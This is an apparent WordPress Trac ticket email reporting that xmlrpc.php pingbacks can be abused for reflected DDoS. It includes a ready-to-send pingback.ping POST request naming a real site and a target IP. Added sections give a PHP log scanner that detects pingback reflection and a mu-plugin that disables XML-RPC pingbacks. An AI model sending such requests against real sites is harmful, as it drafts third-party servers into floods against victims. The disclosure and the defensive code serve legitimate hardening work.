[wp-trac] [WordPress Trac] #50014: ping back vulnerability
WordPress Trac
noreply at wordpress.org
Sun Apr 26 19:34:56 UTC 2020
#50014: ping back vulnerability
--------------------------+-----------------------------
Reporter: jivanshu | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: XML-RPC | Version:
Severity: normal | Keywords:
Focuses: |
--------------------------+-----------------------------
https://blog.optimizely.com/ is a WordPress site.
WordPress sites that have xmlrpc.php enabled for pingbacks, trackbacks, etc.
can be made part of a huge botnet causing a major DDoS. The website
https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
thus potentially be used for such an attack against other victim hosts.
In order to determine whether the xmlrpc.php file is enabled or not, send
the request below using the Repeater tab in Burp (see screenshot).
Notice that a successful response is received, showing that the xmlrpc.php
file is enabled.
Now, considering the domain https://blog.optimizely.com/, the xmlrpc.php
file discussed above could potentially be abused to cause a DDoS attack
against a victim host. This is achieved by simply sending a request that
looks like the one below.
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 259

<methodCall>
<methodName> pingback.ping </methodName>
<params>
<param>
<value>
<string>https://216.58.221.46 </string>
</value>
</param>
<param>
<value>
<string>https://blog.optimizely.com/ </string>
</value>
</param>
</params>
</methodCall>
As soon as the above request is sent, the victim host
(https://216.58.221.46) gets an entry in its log file with a request
originating from the https://blog.optimizely.com/ domain verifying the
pingback.
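Defender-side check for the log entry described above, as an added example that is not part of the ticket or of WordPress core. When WordPress fetches the claimed source URL to verify a pingback, it sends a User-Agent of the form "WordPress/<version>; <site URL>; verifying pingback from <client IP>", where the client IP is the address that submitted the pingback.ping call to the relaying site. The PHP below parses constructed access-log lines in Apache/nginx "combined" format (placeholder hostnames and IPs, not real traffic) and reports which WordPress sites are relaying requests and which origin IPs are named in them.

```php
<?php
// Added example (not part of the ticket, not WordPress core code): scan
// access-log lines for the User-Agent a WordPress site sends while verifying
// a pingback. That header names both the relaying site and the IP that
// submitted the pingback.ping call, which is what a victim needs for
// abuse reports and for firewall rules.

// Constructed sample log lines in "combined" format (placeholder values).
$sampleLog = <<<'LOG'
203.0.113.5 - - [26/Apr/2020:19:34:56 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.20 - - [26/Apr/2020:19:35:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/5.4; https://relay-a.example; verifying pingback from 192.0.2.77"
198.51.100.21 - - [26/Apr/2020:19:35:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/5.3.2; https://relay-b.example; verifying pingback from 192.0.2.77"
198.51.100.20 - - [26/Apr/2020:19:35:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "WordPress/5.4; https://relay-a.example; verifying pingback from 192.0.2.77"
LOG;

/**
 * Parse one combined-format access-log line into its fields.
 * Returns null when the line does not match the format.
 */
function parseCombinedLogLine(string $line): ?array
{
    $pattern = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';
    if (!preg_match($pattern, $line, $m)) {
        return null;
    }
    return [
        'client'     => $m[1],
        'time'       => $m[2],
        'request'    => $m[3],
        'status'     => (int) $m[4],
        'referer'    => $m[6],
        'user_agent' => $m[7],
    ];
}

/**
 * Extract the relaying WordPress site and the originating IP from a
 * pingback-verification User-Agent, or return null if it is not one.
 */
function parsePingbackUserAgent(string $ua): ?array
{
    if (!preg_match('/^WordPress\/[^;]+; (\S+); verifying pingback from (.+)$/', $ua, $m)) {
        return null;
    }
    return ['relay_site' => $m[1], 'origin_ip' => trim($m[2])];
}

/**
 * Summarise reflected pingback traffic: hits per relaying site, plus the
 * distinct origin IPs named in the User-Agent strings.
 */
function summarizePingbackHits(string $log): array
{
    $summary = ['relays' => [], 'origins' => [], 'total' => 0];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parseCombinedLogLine($line);
        if ($entry === null) {
            continue; // not a combined-format line, skip it
        }
        $pb = parsePingbackUserAgent($entry['user_agent']);
        if ($pb === null) {
            continue; // ordinary visitor, not a pingback verification
        }
        $summary['total']++;
        $summary['relays'][$pb['relay_site']] = ($summary['relays'][$pb['relay_site']] ?? 0) + 1;
        $summary['origins'][$pb['origin_ip']] = true;
    }
    $summary['origins'] = array_keys($summary['origins']);
    return $summary;
}

$result = summarizePingbackHits($sampleLog);
printf("%d pingback-verification hit(s) from %d relaying site(s)\n",
    $result['total'], count($result['relays']));
foreach ($result['relays'] as $site => $hits) {
    printf("  %-28s %d hit(s)\n", $site, $hits);
}
printf("origin IP(s) named in the User-Agent: %s\n", implode(', ', $result['origins']));
```

On the constructed input this reports three verification hits from two relaying sites, all naming the same origin IP. On a real log the ratio of distinct relaying sites to distinct origin IPs is the useful signal: many WordPress hosts all verifying pingbacks "from" one or two addresses is the reflection pattern the ticket describes, and the origin IP is the party to block or report, not the relaying sites.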
Remediation:
If the xmlrpc.php file is not being used, it should be disabled and
removed completely to avoid any potential risks. Otherwise, it should at
the very least be blocked from external access.
Thanks.
Note: screenshots are given below.
Impact
This can be automated from multiple hosts and be used to cause a mass DDoS
attack on the victim.
This method is also used for brute-force attacks to steal the admin
credentials and other important credentials.
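The remediation above can also be applied from inside WordPress, so that a core update cannot silently restore a deleted xmlrpc.php. The following must-use plugin is an added example and is not the ticket's or WordPress core's code; it relies on three filters core does expose: xmlrpc_methods (to unregister pingback.ping, which needs no login and is therefore not affected by xmlrpc_enabled), xmlrpc_enabled (to switch off the authenticated methods that the credential brute-forcing mentioned under Impact relies on) and wp_headers (to stop advertising the endpoint through the X-Pingback response header). Only the file name and plugin name are assumptions.

```php
<?php
/**
 * Plugin Name: Disable XML-RPC pingbacks (added example)
 *
 * Added example, not WordPress core code and not part of the ticket.
 * Save as wp-content/mu-plugins/disable-xmlrpc-pingback.php (assumed name);
 * must-use plugins load on every request and cannot be deactivated from
 * the dashboard.
 */

// 1. Unregister the pingback methods only. pingback.ping does not require a
//    login, so this is the filter that actually stops the server from
//    fetching caller-chosen URLs; other XML-RPC clients keep working.
add_filter( 'xmlrpc_methods', function ( array $methods ): array {
    unset( $methods['pingback.ping'] );
    unset( $methods['pingback.extensions.getPingbacks'] );
    return $methods;
} );

// 2. If XML-RPC is not needed at all, also refuse every method that needs
//    credentials (wp.*, blogger.*, metaWeblog.*, ...). This is what removes
//    the credential-guessing surface the Impact section mentions.
add_filter( 'xmlrpc_enabled', '__return_false' );

// 3. Stop advertising the endpoint: WordPress adds an X-Pingback header to
//    single-post responses that points scanners straight at xmlrpc.php.
add_filter( 'wp_headers', function ( array $headers ): array {
    unset( $headers['X-Pingback'] );
    return $headers;
} );

// 4. Close pings on all posts so the target-side check in pingback_ping
//    fails even if another plugin re-registers the method.
add_filter( 'pings_open', '__return_false' );
```

Keep step 1 even when step 2 is in place, because xmlrpc_enabled only guards methods that authenticate. The filters run only after PHP has already handled the request, so they reduce abuse but not load; blocking /xmlrpc.php at the web server or firewall, as the ticket recommends, is still the right first layer where no XML-RPC client is in use.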
--
Ticket URL: <https://core.trac.wordpress.org/ticket/50014>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform